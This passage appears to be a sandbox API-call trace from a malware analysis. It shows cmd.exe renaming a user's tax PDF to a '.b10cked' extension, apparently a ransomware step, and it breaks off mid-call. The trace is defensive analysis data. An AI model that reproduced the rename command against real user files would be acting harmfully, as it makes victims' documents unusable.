Type=0x20000)) returned 0x1c [0141.643] VirtualQuery (in: lpAddress=0x1f3000, 
lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.643] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef98c, dwLength=0x1c | out: lpBuffer=0x2ef98c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.643] GetConsoleOutputCP () returned 0x1b5 [0141.643] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.643] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.643] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.643] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.644] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.644] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.644] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.644] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.644] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.644] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.644] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.644] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.644] GetEnvironmentStringsW () returned 0x4c01d8* [0141.644] FreeEnvironmentStringsW (penv=0x4c01d8) returned 1 [0141.645] GetEnvironmentStringsW () returned 0x4c01d8* [0141.645] FreeEnvironmentStringsW (penv=0x4c01d8) returned 1 [0141.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee92c | out: phkResult=0x2ee92c*=0x40) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: 
lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x0, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x1, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x1, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x0, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x40, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x40, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x40, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegCloseKey (hKey=0x40) returned 0x0 [0141.645] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee92c | out: phkResult=0x2ee92c*=0x40) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x40, lpcbData=0x2ee930*=0x1000) 
returned 0x2 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x1, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x1, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x0, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x9, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x4, lpData=0x2ee938*=0x9, lpcbData=0x2ee930*=0x4) returned 0x0 [0141.645] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee934, lpData=0x2ee938, lpcbData=0x2ee930*=0x1000 | out: lpType=0x2ee934*=0x0, lpData=0x2ee938*=0x9, lpcbData=0x2ee930*=0x1000) returned 0x2 [0141.645] RegCloseKey (hKey=0x40) returned 0x0 [0141.645] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.645] srand (_Seed=0x5b886370) [0141.645] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"" [0141.645] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"" [0141.646] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.646] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c1938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.646] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.646] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.646] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.646] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.646] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.646] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.646] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.646] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.646] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.646] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.646] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.646] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.646] GetEnvironmentStringsW () returned 0x4c2328* [0141.646] FreeEnvironmentStringsW (penv=0x4c2328) returned 1 [0141.646] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.646] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="") returned 0x0 [0141.646] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.646] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.647] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.647] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.647] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.647] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.647] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.647] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.647] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef6f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef6f8, lpFilePart=0x2ef6f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef6f4*="Desktop") returned 0x18 [0141.647] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.647] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef474 | out: lpFindFileData=0x2ef474) returned 0x4c0068 [0141.647] FindClose (in: hFindFile=0x4c0068 | out: hFindFile=0x4c0068) returned 1 [0141.647] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef474 | out: lpFindFileData=0x2ef474) returned 0x4c0068 [0141.647] FindClose (in: hFindFile=0x4c0068 | out: hFindFile=0x4c0068) returned 1 [0141.647] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef474 | out: lpFindFileData=0x2ef474) returned 0x4c0068 [0141.647] FindClose (in: hFindFile=0x4c0068 | out: hFindFile=0x4c0068) returned 1 [0141.647] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.647] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 1 [0141.648] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.648] GetEnvironmentStringsW () returned 0x4c2b48* [0141.648] FreeEnvironmentStringsW (penv=0x4c2b48) returned 1 [0141.648] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.648] GetConsoleOutputCP () returned 0x1b5 [0141.648] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.648] GetUserDefaultLCID () returned 0x409 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef838, cchData=128 | out: lpLCData="0") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef838, cchData=128 | out: lpLCData="0") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef838, cchData=128 | out: lpLCData="1") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.649] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.649] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.650] GetConsoleTitleW (in: lpConsoleTitle=0x4b0918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.650] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.650] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.650] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.650] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.651] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.651] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.651] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.651] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.651] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.651] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.651] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.654] GetConsoleTitleW (in: lpConsoleTitle=0x2ef530, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.654] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.654] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.654] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.654] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.654] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.654] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.654] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.654] 
_wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.654] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.654] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.654] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.654] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.654] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.654] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.654] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.654] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.655] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.655] _wcsicmp (_String1="move", _String2="RD") returned -5 [0141.655] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.655] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.655] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.655] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.655] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.655] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.655] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.655] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.655] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.655] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.655] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.655] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.655] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.655] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.655] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.655] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.655] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 
[0141.656] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef2ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef2e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef2e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", 
_MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.657] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.658] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.658] _wcsicmp (_String1="TAXJKD~1.PDF", _String2=".") returned 70 [0141.658] _wcsicmp (_String1="TAXJKD~1.PDF", _String2="..") returned 70 [0141.658] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkd~1.pdf")) returned 0x20 [0141.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c1ec8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.658] SetErrorMode (uMode=0x0) returned 0x0 [0141.658] SetErrorMode (uMode=0x1) returned 0x0 [0141.658] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", nBufferLength=0x104, lpBuffer=0x2eec74, lpFilePart=0x2eec5c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", lpFilePart=0x2eec5c*="TAXJKD~1.PDF") returned 0x34 [0141.658] SetErrorMode (uMode=0x0) returned 0x1 [0141.658] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x12 [0141.658] _wcsicmp (_String1="TAXJKD~1.PDF", _String2=".") returned 70 [0141.658] _wcsicmp (_String1="TAXJKD~1.PDF", _String2="..") returned 70 [0141.658] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkd~1.pdf")) returned 0x20 [0141.658] SetErrorMode (uMode=0x0) returned 0x0 [0141.659] SetErrorMode (uMode=0x1) returned 0x0 [0141.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", nBufferLength=0x104, lpBuffer=0x2ef0f0, lpFilePart=0x2eee88 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", lpFilePart=0x2eee88*="TAXJKD~1.PDF") returned 0x34 [0141.659] SetErrorMode (uMode=0x0) returned 0x1 [0141.659] SetErrorMode (uMode=0x0) returned 0x0 [0141.659] SetErrorMode (uMode=0x1) returned 0x0 [0141.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x2ef2f8, lpFilePart=0x2eee88 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked", lpFilePart=0x2eee88*="TAXJKdn0yOKX7tSSpc.pdf.b10cked") returned 0x46 [0141.659] SetErrorMode (uMode=0x0) returned 0x1 [0141.659] SetLastError (dwErrCode=0x0) [0141.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf.b10cked")) returned 0xffffffff [0141.659] GetLastError () returned 0x2 [0141.659] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x2ee804, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee804) returned 0x4b0f48 [0141.659] FindNextFileW (in: hFindFile=0x4b0f48, lpFindFileData=0x2ee804 | out: lpFindFileData=0x2ee804) returned 0 [0141.660] GetLastError () returned 0x12 [0141.660] FindClose (in: hFindFile=0x4b0f48 | out: hFindFile=0x4b0f48) returned 1 [0141.660] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x4c1c68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1c68) returned 0x4b0f48 [0141.661] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x2eea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked", lpFilePart=0x0) returned 0x46 [0141.661] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf", nBufferLength=0x104, lpBuffer=0x2eea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf", lpFilePart=0x0) returned 0x3e [0141.661] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf")) returned 0x20 [0141.661] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked" 
